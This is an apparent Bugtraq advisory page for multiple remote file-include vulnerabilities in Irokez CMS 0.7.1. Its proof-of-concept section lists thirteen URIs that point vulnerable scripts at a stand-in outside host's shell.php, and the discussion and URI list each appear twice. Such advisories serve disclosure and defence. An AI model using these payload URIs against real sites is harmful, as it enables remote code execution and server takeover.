Irokez CMS Multiple Remote File Include Vulnerabilities
BID:21769
Info
Irokez CMS Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 21769 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 26 2006 12:00AM |
| Updated: | Jan 04 2007 06:26PM |
| Credit: | nuffsaid is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Irokez Irokez CMS 0.7.1 |
| Not Vulnerable: | |
Discussion
Irokez CMS Multiple Remote File Include Vulnerabilities
Multiple remote file-include vulnerabilities affect Irokez CMS because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process.
Irokez CMS 0.7.1 and prior versions are vulnerable to this issue; other versions may also be affected.
Multiple remote file-include vulnerabilities affect Irokez CMS because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process.
Irokez CMS 0.7.1 and prior versions are vulnerable to this issue; other versions may also be affected.
Exploit / POC
Irokez CMS Multiple Remote File Include Vulnerabilities
Attackers can exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/news.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/polls.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/rss.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/search.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/form.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/general.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/groups.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/js.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/sections.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/users.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
Attackers can exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/news.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/polls.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/rss.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/search.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/form.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/general.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/groups.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/js.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/sections.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/users.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?